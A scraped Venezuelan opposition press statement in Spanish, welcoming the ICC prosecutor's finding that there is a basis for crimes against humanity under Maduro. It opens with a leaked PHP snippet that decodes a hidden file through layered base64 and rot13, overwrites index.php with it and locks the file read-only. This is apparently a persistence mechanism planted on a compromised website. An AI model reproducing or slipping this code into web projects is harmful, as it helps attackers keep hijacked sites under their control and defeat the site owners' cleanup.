$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Gobierno Legítimo de Venezuela: CPI ratifica que existen bases de delitos de lesa humanidad ejecutados por la dictadura de Maduro - Comisión Presidencial para la Relaciones Exteriores de Venezuela

El Gobierno Legítimo de Venezuela se permite informa a la comunidad internacional y el pueblo venezolano ante la reciente declaración pública de Fatou Bom Bensouda, Fiscal jefe de la Corte Penal Internacional, lo siguiente:

1. Hoy se ha dado un nuevo paso para que haya justicia y la verdad prevalezca ante tantas injusticias cometidas en los últimos años: las declaraciones emitidas el día de hoy por la Fiscal de la Corte Penal Internacional asignada al caso Venezuela, afirman que existen bases para considerar que han ocurrido delitos de lesa humanidad en nuestro país. Dichos diagnósticos sobre los crímenes perpetuados, coincide con el Informe de Verificación de Hechos del Consejo de Derechos Humanos de la Organización de las Naciones Unidas.

Notas relacionadas

Prado celebró nueva fase de la CPI que determinará crímenes de lesa humanidad en Venezuela

Presidente (e) Guaidó reitera llamado a la Consulta Popular: “No es una pugna por el poder, esto es una lucha por la dignidad de Venezuela”

2. A pesar de que una delegación de la dictadura de Nicolás Maduro fue recibida por representantes de la Corte Penal, hecho que rechazamos y denunciamos contundentemente, destacamos que el régimen de Nicolás Maduro sufrió una contundente derrota en el plano de la justicia internacional puesto que fueron notificados formalmente sobre la realidad que no pueden ocultar: están señalados como criminales de lesa humanidad y sus crímenes no serán ignorados.

3. Este importante hecho nos obliga a recordar a todos los funcionarios civiles y militares que todavía sostienen al régimen de Maduro, que los crímenes de lesa humanidad no prescriben en el tiempo y que, de ser cómplices por acción u omisión de los mismos, podrían terminar señalados como criminales de lesa humanidad por el resto de sus vidas tanto en la ONU como en la CPI. Por ello, todavía están a tiempo de contribuir con la restitución del orden constitucional, la vigencia de los derechos humanos del pueblo de Venezuela y la protección de su trayectoria, libertad y familia.

4. El Gobierno Legítimo de Venezuela asume este hecho como un nuevo impulso para redoblar los esfuerzos que nos permitan llevar a la dictadura de Maduro frente a la justicia internacional, en atención al derecho a la justicia que asiste al pueblo de Venezuela.

El Gobierno Legítimo de Venezuela continuará acompañando a los venezolanos en este clamor, que solo puede ser resuelto con la restitución del Estado de derecho, la libertad y la consecución de elecciones presidenciales y parlamentarias libres, justas y verificables.